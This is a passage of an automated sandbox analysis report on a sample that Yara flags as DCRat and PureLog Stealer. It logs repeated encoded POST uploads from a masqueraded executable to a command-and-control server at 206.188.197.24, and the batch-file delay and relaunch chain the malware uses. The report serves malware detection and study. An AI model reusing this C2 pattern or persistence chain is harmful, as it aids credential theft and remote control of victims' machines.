Jan 3, 2025 21:13:11.784159899 CET	355	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:13:12.133048058 CET	344	OUT	Data Raw: 00 0b 04 03 06 01 04 02 05 06 02 01 02 0c 01 06 00 05 05 0b 02 03 03 09 00 01 0c 0d 07 04 00 06 0d 02 06 59 07 04 06 51 0c 51 02 0a 04 04 07 54 05 02 0c 5b 0d 55 05 04 01 02 06 03 04 52 05 58 01 07 0f 01 04 07 05 06 0c 05 0c 00 0d 51 0e 04 02 00 Data Ascii: YQQT[URXQQ\L}R~`~MvbabflRyw\|Z\|sRD{l^_{YyZkn\|A`g`Oju~V@{mnL~Lu
Jan 3, 2025 21:13:12.473135948 CET	326	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:13:12 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49879	206.188.197.24	80	5824	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:13:18.620438099 CET	390	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 206.188.197.24 Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:13:18.976638079 CET	336	OUT	Data Raw: 05 05 01 07 03 0a 04 01 05 06 02 01 02 05 01 0a 00 0a 05 0a 02 05 03 01 07 06 0e 05 04 05 01 05 0d 06 05 0a 02 54 04 51 0e 01 06 00 05 05 05 0f 03 03 0f 0e 0a 05 06 0a 07 06 03 01 05 00 06 01 01 03 0f 0b 04 0e 06 09 0c 54 0e 00 0e 04 0b 07 07 04 Data Ascii: TQTPW\L~\|^b`\PXvkQ\|Br\wlwYZo_{l^ZzpjK}wTcg\iO~V@zm~Ney
Jan 3, 2025 21:13:19.236278057 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:13:19 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49949	206.188.197.24	80	1144	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:13:30.304214954 CET	355	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:13:30.648742914 CET	344	OUT	Data Raw: 00 0b 04 00 03 0d 01 00 05 06 02 01 02 04 01 03 00 01 05 0d 02 06 03 09 03 00 0d 00 04 54 00 08 0d 52 07 0e 07 0d 04 0b 0e 51 05 0a 07 01 06 0f 06 06 0b 0d 0e 02 05 01 05 0e 04 02 07 02 04 58 05 05 0f 0b 07 51 04 04 0b 03 0c 52 0f 03 0f 01 05 53 Data Ascii: TRQXQRSUXU\L}T^fwqmwe^Bhawlk_h]ZIylJx`}^SZCwgc^}e~V@@x}~}\u
Jan 3, 2025 21:13:30.954024076 CET	326	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:13:30 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49990	206.188.197.24	80	1856	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:13:36.957830906 CET	408	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:13:37.304934025 CET	344	OUT	Data Raw: 05 01 04 02 03 0a 01 01 05 06 02 01 02 0d 01 03 00 06 05 09 02 01 03 0b 00 56 0d 02 04 0e 01 05 0f 06 04 01 00 51 07 02 0c 03 04 02 04 03 04 04 06 06 0b 08 0d 52 07 00 05 01 03 05 06 04 07 0d 00 03 0d 5c 00 0f 04 05 0f 0f 0b 00 0c 01 0f 02 07 50 Data Ascii: VQR\P\L~h`~trT_bulBytoc\s]^oBl^{`}X\|oP`Yp}O~V@x}bN~b}
Jan 3, 2025 21:13:37.678580999 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:13:37 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50013	206.188.197.24	80	7372	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:13:48.125876904 CET	355	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:13:48.476969004 CET	344	OUT	Data Raw: 00 02 04 00 03 0f 04 05 05 06 02 01 02 03 01 00 00 00 05 0a 02 07 03 01 00 03 0c 06 05 07 02 02 0a 03 03 0f 00 03 03 03 0c 56 02 07 06 05 06 05 06 53 0d 00 0c 03 01 04 06 07 06 54 05 07 06 58 02 01 0f 5d 00 05 04 54 0f 02 0e 01 0f 51 0c 09 02 06 Data Ascii: VSTX]TQSYPW\L~^q[triwv\|\|oj^t\|hhchoB^YlN__}n\|wwt~_~V@xCzO}L[
Jan 3, 2025 21:13:48.777456999 CET	326	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:13:48 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	50014	206.188.197.24	80

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:13:58.914627075 CET	391	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:13:59.273648977 CET	344	OUT	Data Raw: 05 07 04 01 06 01 04 07 05 06 02 01 02 0d 01 00 00 07 05 0a 02 06 03 0a 02 03 0f 51 06 50 02 03 0d 05 06 5b 02 56 03 05 0e 0a 02 02 06 02 04 0f 07 05 0f 0c 0c 0e 07 01 06 53 07 06 07 07 00 0d 05 00 0a 0a 00 03 01 09 0f 03 0b 03 0f 03 0f 07 02 06 Data Ascii: QP[VSTRR\L~Ck^a^t[iu\oUl\^v\|tMhc^ycx`rD\|}\|Avd_ie~V@xCfO}\y
Jan 3, 2025 21:13:59.544287920 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:13:59 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	15:11:54
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\OH6KO8NBy1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\OH6KO8NBy1.exe"
Imagebase:	0x680000
File size:	1'656'320 bytes
MD5 hash:	07A0FB75F52C87371C88F48AE80AFA1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1653332376.0000000000682000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:11:56
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat"
Imagebase:	0x7ff71fe50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:11:56
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:11:56
Start date:	03/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e1580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:11:56
Start date:	03/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75e8f0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:12:02
Start date:	03/01/2025
Path:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Imagebase:	0x350000
File size:	1'656'320 bytes
MD5 hash:	07A0FB75F52C87371C88F48AE80AFA1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1750679777.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:12:04
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat"
Imagebase:	0x7ff71fe50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:12:04
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:12:04
Start date:	03/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e1580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:12:04
Start date:	03/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7671b0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:12:13
Start date:	03/01/2025
Path:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Imagebase:	0x180000
File size:	1'656'320 bytes
MD5 hash:	07A0FB75F52C87371C88F48AE80AFA1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1859735247.0000000002727000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:12:15
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat"
Imagebase:	0x7ff71fe50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:12:15
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:12:15
Start date:	03/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e1580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:12:15
Start date:	03/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7671b0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:12:24
Start date:	03/01/2025
Path:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Imagebase:	0x9e0000
File size:	1'656'320 bytes
MD5 hash:	07A0FB75F52C87371C88F48AE80AFA1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:12:25
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat"
Imagebase:	0x7ff71fe50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:12:25
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:12:26
Start date:	03/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e1580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:12:26
Start date:	03/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75e8f0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:12:31
Start date:	03/01/2025
Path:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Imagebase:	0xc20000
File size:	1'656'320 bytes
MD5 hash:	07A0FB75F52C87371C88F48AE80AFA1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:12:32
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Imagebase:	0x7ff71fe50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:12:32
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:12:32
Start date:	03/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e1580000
File size:	14'848 bytes
